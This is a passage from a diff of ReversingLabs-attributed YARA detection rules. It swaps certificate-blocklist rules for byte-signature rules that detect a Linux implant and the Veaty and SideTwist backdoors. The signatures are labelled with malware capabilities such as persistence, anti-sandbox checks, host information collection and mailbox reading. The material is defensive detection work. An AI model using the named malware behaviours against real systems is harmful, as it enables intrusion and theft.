+            48 83 ED ?? 4C 39 F5 0F 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 85
+            C0 0F 84 ?? ?? ?? ?? 48 89 DF 49 8D 5C 24 ?? E8 ?? ?? ?? ?? 49 39 DE 0F 85 ?? ?? ??
+            ?? 48 8B 5C 24 ?? 48 83 EB ?? 49 39 DE 0F 85 ?? ?? ?? ?? 49 8D 5D ?? 49 39 DE 0F 85
+            ?? ?? ?? ?? 49 81 FF ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 83 C4 ?? 5B 5D 41 5C 41 5D 41
+            5E 41 5F C3
+        }
+		$change_timestamp_and_read_config_v11 = {
+            55 53 48 83 EC ?? 48 8D 5C 24 ?? 48 89 E7 E8 ?? ?? ?? ?? 48 89 E6 48 89 DF E8 ?? ??
+            ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 48 81 FB ?? ?? ?? ?? 0F 85
+            ?? ?? ?? ?? 48 89 E6 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 1C 24 BE ?? ?? ?? ?? 48 89
+            DF E8 ?? ?? ?? ?? 48 85 C0 74 ?? 48 83 C0 ?? 89 C5 29 DD 8D 7D ?? 48 63 FF E8 ?? ??
+            ?? ?? 48 63 D5 48 89 C3 48 89 C7 C6 04 02 ?? 48 8B 34 24 E8 ?? ?? ?? ?? 48 89 DF E8
+            ?? ?? ?? ?? 48 89 DE 48 89 C2 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ??
+            BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 1C 24 B8 ?? ?? ??
+            ?? 48 83 EB ?? 48 39 D8 75 ?? 48 83 C4 ?? 5B 5D C3
+        }
+		$generate_machine_id_v11 = {
+            41 57 BE ?? ?? ?? ?? 49 89 FF 41 56 41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 48 8D 9C
+            24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 4C 8D AC 24 ?? ?? ??
+            ?? 31 C9 BA ?? ?? ?? ?? 48 89 DE 4C 89 EF E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 41
+            BE ?? ?? ?? ?? 48 83 EB ?? 4C 39 F3 0F 85 ?? ?? ?? ?? 4C 8D A4 24 ?? ?? ?? ?? 48 8B
+            B4 24 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 8B 84 24
+            ?? ?? ?? ?? 48 83 78 ?? ?? 0F 84 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 48 8D 94 24 ??
+            ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 31 C9 BA ??
+            ?? ?? ?? 48 89 DE 48 89 EF E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 83 EB ?? 49 39
+            DE 0F 85 ?? ?? ?? ?? 48 89 EE 4C 89 E7 E8 ?? ?? ?? ?? 48 8B B4 24 ?? ?? ?? ?? 48 8D
+            BC 24 ?? ?? ?? ?? 48 8B 56 ?? E8 ?? ?? ?? ?? 31 FF 4C 8B AC 24 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 89 C7 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 C6 48 8D BC 24 ?? ?? ??
+            ?? F7 EA 89 F1 89 F5 C1 F9 ?? C1 FA ?? 29 CA 69 D2 ?? ?? ?? ?? 29 D5 E8 ?? ?? ?? ??
+            48 8B 9C 24 ?? ?? ?? ?? 41 89 E8 31 C0 4C 89 E9 BE ?? ?? ?? ?? 48 89 E7 48 89 DA 48
+            83 EB ?? E8 ?? ?? ?? ?? 49 39 DE 89 C5 0F 85 ?? ?? ?? ?? 48 63 C5 48 8D 94 24 ?? ??
+            ?? ?? 48 8D BC 24 ?? ?? ?? ?? C6 04 04 ?? 48 89 E6 E8 ?? ?? ?? ?? 48 8D 94 24 ?? ??
+            ?? ?? 48 89 E6 4C 89 FF E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 83 EB ?? 49 39 DE
+            0F 85 ?? ?? ?? ?? 49 8D 5D ?? 49 39 DE 0F 85 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48
+            83 EB ?? 49 39 DE 0F 85 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 83 EB ?? 49 39 DE 0F
+            85 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 83 EB ?? 49 39 DE 0F 85 ?? ?? ?? ?? 48 81
+            C4 ?? ?? ?? ?? 4C 89 F8 5B 5D 41 5C 41 5D 41 5E 41 5F C3
+        }
+		$persistence_mechanism_redhat_v7 = {
+            48 89 6C 24 ?? 4C 89 7C 24 ?? 48 89 5C 24 ?? 4C 89 64 24 ?? 4C 89 6C 24 ?? 4C 89 74
+            24 ?? 48 81 EC ?? ?? ?? ?? 48 8D 7C 24 ?? E8 ?? ?? ?? ?? 48 8B 6C 24 ?? 8B 7D ?? 4C
+            8D 7D ?? 81 C7 ?? ?? ?? ?? 48 63 FF E8 ?? ?? ?? ?? 48 89 C3 48 8D 7C 24 ?? 48 89 EE
+            E8 ?? ?? ?? ?? 4C 8B 64 24 ?? BE ?? ?? ?? ?? 48 89 DF 31 C0 4C 8D 74 24 ?? 4C 89 E2
+            E8 ?? ?? ?? ?? 48 98 48 8D 54 24 ?? 48 89 DE C6 04 18 ?? 4C 89 F7 E8 ?? ?? ?? ?? 48
+            8B 7C 24 ?? 31 F6 E8 ?? ?? ?? ?? 85 C0 74 ?? 4C 89 E1 4C 89 E2 BE ?? ?? ?? ?? 48 89
+            DF 49 89 E9 4D 89 E0 31 C0 E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 41 89 C5 B9 ?? ?? ?? ?? 89
+            C2 48 89 DE E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 31 F6 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ??
+            ?? 48 8B 54 24 ?? 48 89 DF BE ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ??
+            ?? 4C 89 E2 BE ?? ?? ?? ?? 48 89 DF 31 C0 E8 ?? ?? ?? ?? 48 98 48 89 E7 31 C9 C6 04
+            18 ?? BA ?? ?? ?? ?? 48 89 DE E8 ?? ?? ?? ?? 48 8B 2C 24 BE ?? ?? ?? ?? 48 89 EF E8
+            ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 89 DF 48 8D 5D ?? BD ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 48 39 EB 0F 85 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 48 39 DD 0F 85 ?? ?? ??
+            ?? 49 8D 5C 24 ?? 48 39 DD 0F 85 ?? ?? ?? ?? 49 81 FF ?? ?? ?? ?? 0F 85 ?? ?? ?? ??
+            48 8B 5C 24 ?? 48 8B 6C 24 ?? 4C 8B 64 24 ?? 4C 8B AC 24 ?? ?? ?? ?? 4C 8B B4 24 ??
+            ?? ?? ?? 4C 8B BC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3
+        }
+		$get_device_name_v7 = {
+            48 89 5C 24 ?? 48 89 6C 24 ?? BE ?? ?? ?? ?? 4C 89 64 24 ?? 4C 89 6C 24 ?? B9 ?? ??
+            ?? ?? 4C 89 74 24 ?? 48 81 EC ?? ?? ?? ?? 4C 8B 05 ?? ?? ?? ?? 48 8D 5C 24 ?? BA ??
+            ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 89 DE BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 5C 24
+            ?? 41 BD ?? ?? ?? ?? 48 83 EB ?? 4C 39 EB 0F 85 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48
+            83 78 ?? ?? 75 ?? 48 8D 5C 24 ?? 48 89 DF E8 ?? ?? ?? ?? 48 89 DE BF ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 49 39 DD 0F 85 ?? ?? ?? ?? 48 8B 0D ?? ?? ??
+            ?? 48 8B 15 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 7C 24 ??
+            E8 ?? ?? ?? ?? 4C 8B 64 24 ?? 48 89 E7 E8 ?? ?? ?? ?? 48 8B 2C 24 48 8D 5C 24 ?? 41
+            B8 ?? ?? ?? ?? 4C 89 E2 BE ?? ?? ?? ?? 31 C0 48 89 DF 48 89 E9 E8 ?? ?? ?? ?? 48 89
+            DE BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 49 39 DD 0F 85 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 48 8D 5D ?? 49 39 DD 0F 85 ?? ?? ?? ?? 49 8D 5C 24 ?? 49 39 DD 0F
+            85 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 8B 6C 24 ?? 4C 8B 64 24 ?? 4C 8B 6C 24 ?? 4C 8B B4
+            24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3
+        }
+		$generate_machine_id_v7 = {
+            41 57 31 C9 BA ?? ?? ?? ?? BE ?? ?? ?? ?? 49 89 FF 41 56 41 55 41 54 55 53 48 81 EC
+            ?? ?? ?? ?? 4C 8D A4 24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ??
+            48 8B B4 24 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 48 8B
+            84 24 ?? ?? ?? ?? 48 83 78 ?? ?? 0F 84 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 31 C9 BA
+            ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 89 DE 48 89 EF E8 ?? ?? ?? ??
+            48 8B B4 24 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? 48 8B 56 ?? E8 ?? ?? ?? ?? 31 FF 4C
+            8B B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C7 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ??
+            ?? 89 C6 48 8D BC 24 ?? ?? ?? ?? F7 EA 89 F1 89 F5 C1 F9 ?? C1 FA ?? 29 CA 69 D2 ??
+            ?? ?? ?? 29 D5 E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 41 89 E8 31 C0 4C 89 F1 BE ??
+            ?? ?? ?? 48 89 E7 41 BD ?? ?? ?? ?? 48 89 DA 48 83 EB ?? E8 ?? ?? ?? ?? 4C 39 EB 89
+            C5 0F 85 ?? ?? ?? ?? 48 63 C5 48 8D 94 24 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? C6 04
+            04 ?? 48 89 E6 E8 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 89 E6 4C 89 FF E8 ?? ?? ??
+            ?? 48 8B 9C 24 ?? ?? ?? ?? 48 83 EB ?? 49 39 DD 0F 85 ?? ?? ?? ?? 49 8D 5E ?? 49 39
+            DD 0F 85 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 83 EB ?? 49 39 DD 0F 85 ?? ?? ?? ??
+            48 8B 9C 24 ?? ?? ?? ?? 48 83 EB ?? 49 39 DD 0F 85 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ??
+            ?? 48 83 EB ?? 49 39 DD 0F 85 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 4C 89 F8 5B 5D 41 5C
+            41 5D 41 5E 41 5F C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALM4U GmbH" and ( pe.signatures [ i ] . serial == "00:bd:c8:1b:c7:60:90:da:e0:ee:e2:e1:eb:74:4a:4f:9a" or pe.signatures [ i ] . serial == "bd:c8:1b:c7:60:90:da:e0:ee:e2:e1:eb:74:4a:4f:9a" ) and 1579824000 <= pe.signatures [ i ] . not_after )
+		uint32( 0 ) == 0x464C457F and ( ( $persistence_mechanism_ubuntu ) and ( all of ( $network_communication_* ) ) and ( ( ( $change_timestamp_and_read_config_v11 ) and ( $persistence_mechanism_redhat_v11 ) and ( $generate_machine_id_v11 ) ) or ( ( $persistence_mechanism_redhat_v7 ) and ( $get_device_name_v7 ) and ( $generate_machine_id_v7 ) ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_B2E730B0526F36Faf7D093D48D6D9997 : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Backdoor_Veaty : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Veaty backdoor."
 		author = "ReversingLabs"
-		id = "eb82e05b-9aee-5ea7-88a5-8d186b8aafb8"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "da03c6a4-388e-59b2-b94f-63da2c15e464"
+		date = "2025-10-13"
+		modified = "2025-10-13"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5044-L5062"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/ByteCode.MSIL.Backdoor.Veaty.yara#L1-L84"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f74cc94428d7739abf6ee76f6cbd53aa47cea815a014de0d786fe53b15f66201"
+		logic_hash = "77e5ffee617b5d4e4b28d99b25dd6ea2f89551a702c6a25a2db3edbf941d034d"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "Veaty"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bamboo Connect s.r.o." and ( pe.signatures [ i ] . serial == "00:b2:e7:30:b0:52:6f:36:fa:f7:d0:93:d4:8d:6d:99:97" or pe.signatures [ i ] . serial == "b2:e7:30:b0:52:6f:36:fa:f7:d0:93:d4:8d:6d:99:97" ) and 1597276800 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_7156Ec47Ef01Ab8359Ef4304E5Af1A05 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "b285a407-7f71-5c7e-baae-bfa111a50101"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5064-L5080"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "7bb093287dd309ce12859eca9a9fc98095b3d52ec860626fe6e743bace262fde"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$fetch_commands = {
+            73 ?? ?? ?? ?? 0A 72 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0D 02 03 04 05 0E ?? 28 ?? ?? ??
+            ?? 0C 72 ?? ?? ?? ?? 13 ?? 08 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ??
+            ?? 13 ?? 0E ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 02 11 ?? 28 ?? ?? ?? ?? 13 ?? 11
+            ?? 2D ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2B ?? 0E ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C
+            ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 2B ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72
+            ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 11 ?? 16 6F ?? ?? ?? ?? 06 11 ?? 6F ?? ?? ?? ?? 72 ??
+            ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DE
+            ?? 12 ?? (FE | 16) ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? DC 08 6F ?? ?? ?? ?? 2D ?? 09 72 ??
+            ?? ?? ?? 73 ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 72 ?? ??
+            ?? ?? 06 6F ?? ?? ?? ?? 09 13 ?? DD ?? ?? ?? ?? 08 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 0B 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 09 72 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 07
+            6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 72 ?? ?? ?? ?? 06 6F ?? ?? ?? ?? DE ?? 13 ?? 72 ??
+            ?? ?? ?? 11 ?? 25 2D ?? 26 14 2B ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 11
+            ?? 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 13 ?? 72 ?? ?? ?? ?? 11 ?? 25 2D ?? 26 14 2B ??
+            6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A
+            09 2A 11
+        }
+		$read_mailbox_folder = {
+            73 ?? ?? ?? ?? 0A 03 04 28 ?? ?? ?? ?? 26 1F ?? 0B 18 8D ?? ?? ?? ?? 25 16 7E ?? ??
+            ?? ?? A2 25 17 7E ?? ?? ?? ?? A2 0C 17 08 13 ?? 11 ?? 73 ?? ?? ?? ?? 0D 07 73 ?? ??
+            ?? ?? 13 ?? 05 6F ?? ?? ?? ?? 16 3E ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 17 6F ??
+            ?? ?? ?? 11 ?? 18 6F ?? ?? ?? ?? 11 ?? 05 6F ?? ?? ?? ?? 0E ?? 72 ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 2C ?? 11 ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 2B ?? 0E ?? 72 ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 2C ?? 11 ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 03 04 11 ?? 11 ?? 6F ?? ?? ?? ??
+            6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 03 11 ?? 6F ??
+            ?? ?? ?? 09 28 ?? ?? ?? ?? 74 ?? ?? ?? ?? 13 ?? 06 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ??
+            ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 05 6F ?? ?? ?? ?? 2D ?? 03
+            04 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 6F ?? ?? ??
+            ?? 13 ?? 03 11 ?? 6F ?? ?? ?? ?? 09 28 ?? ?? ?? ?? 74 ?? ?? ?? ?? 13 ?? 06 11 ?? 6F
+            ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC DE
+            ?? 13 ?? 72 ?? ?? ?? ?? 11 ?? 25 2D ?? 26 14 2B ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 28
+            ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 13 ?? 72 ?? ?? ?? ?? 11 ?? 25 2D
+            ?? 26 14 2B ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 73
+            ?? ?? ?? ?? 7A 06 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? (FE | 06) ?? ?? ?? ?? ??
+            73 ?? ?? ?? ?? 25 80
+        }
+		$add_move_to_inbox_rule = {
+            02 7B ?? ?? ?? ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 7E ??
+            ?? ?? ?? 6F ?? ?? ?? ?? 0A DE ?? 0B 72 ?? ?? ?? ?? 07 25 2D ?? 26 14 2B ?? 6F ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 0C 72 ?? ??
+            ?? ?? 08 25 2D ?? 26 14 2B ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 6F ??
+            ?? ?? ?? 73 ?? ?? ?? ?? 7A 00 73 ?? ?? ?? ?? 0D 09 05 6F ?? ?? ?? ?? 09 6F ?? ?? ??
+            ?? 0E ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 09 6F ??
+            ?? ?? ?? 16 6F ?? ?? ?? ?? 09 17 6F ?? ?? ?? ?? 09 17 6F ?? ?? ?? ?? 04 72 ?? ?? ??
+            ?? 28 ?? ?? ?? ?? 2C ?? 09 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 03 6F ?? ?? ?? ?? 2B ?? 04
+            72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 09 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 03 6F ?? ?? ??
+            ?? 09 73 ?? ?? ?? ?? 13 ?? 06 17 8D ?? ?? ?? ?? 25 16 11 ?? A2 17 6F ?? ?? ?? ?? 7E
+            ?? ?? ?? ?? 13 ?? DE ?? 26 7E ?? ?? ?? ?? 13 ?? DE
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BOREC, OOO" and pe.signatures [ i ] . serial == "71:56:ec:47:ef:01:ab:83:59:ef:43:04:e5:af:1a:05" and 1597363200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $fetch_commands ) and ( $read_mailbox_folder ) and ( $add_move_to_inbox_rule )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_13794371C052Ec0559E9B492Abb25C26 : INFO FILE
+rule REVERSINGLABS_Win64_Backdoor_Sidetwist : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects SideTwist backdoor."
 		author = "ReversingLabs"
-		id = "31f119a3-e0da-5875-826f-68c40c6f8b88"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "979b442e-8739-54a8-b486-39fc5673791e"
+		date = "2024-03-18"
+		modified = "2024-03-18"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5082-L5098"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/Win64.Backdoor.SideTwist.yara#L1-L154"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "7383d1fb1fa6e49f8fa9e1eecfe3fcedb8a11702fbd3700630a11b12da29fedf"
+		logic_hash = "811fa73ede59493c71435743848a3fce3a1604ec4065ffcb0b43e9715dfa5c31"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "SideTwist"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Carmel group LLC" and pe.signatures [ i ] . serial == "13:79:43:71:c0:52:ec:05:59:e9:b4:92:ab:b2:5c:26" and 1599177600 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_5C7E78F53C31D6Aa5B45De14B47Eb5C4 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "5906107a-03ce-5ca4-b0a7-12b0b45359dd"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5100-L5116"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "7521abc5c93f0336af4fab95268962aa3d3fb48fed6a8ba7fdb98e373158b327"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$anti_sandbox_detect_environment = {
+            55 57 56 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 89 4D ?? 48 89 55 ?? E8 ??
+            ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48 8D 55 ?? 48 8D 45 ?? 4C
+            8D 05 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 85 C0 75 ?? 48 8B 45 ?? 48 85
+            C0 74 ?? B8 ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 48 8D 45 ?? 48
+            89 C1 E8 ?? ?? ?? ?? 48 8B 55 ?? 48 8D 4D ?? 48 8D 45 ?? 49 89 C8 48 89 C1 E8 ?? ??
+            ?? ?? 48 8D 45 ?? 48 8D 55 ?? 4C 8D 05 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45
+            ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C1
+            E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF
+            D0 85 C0 0F 94 C0 84 C0 74 ?? 48 8D 05 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF
+            D0 BB ?? ?? ?? ?? BE ?? ?? ?? ?? EB
+        }
+		$collect_host_information = {
+            55 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 4D ?? 48 89 55 ?? C7 45 ??
+            ?? ?? ?? ?? 8B 45 ?? 89 C0 48 BA ?? ?? ?? ?? ?? ?? ?? ?? 48 39 C2 72 ?? 48 01 C0 48
+            89 C1 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 55 ?? 48
+            8B 45 ?? 49 89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ??
+            48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 55 ?? 48 8B 45 ?? 49 89 D0 48 89 C2 B9 ??
+            ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 85 C0 0F 95 C0 84 C0 0F 84 ?? ?? ?? ?? 48 8D 45
+            ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 4D ?? 48 8B 55 ?? 48 8D 45 ?? 49 89 C8 48 89 C1 E8
+            ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ??
+            48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48
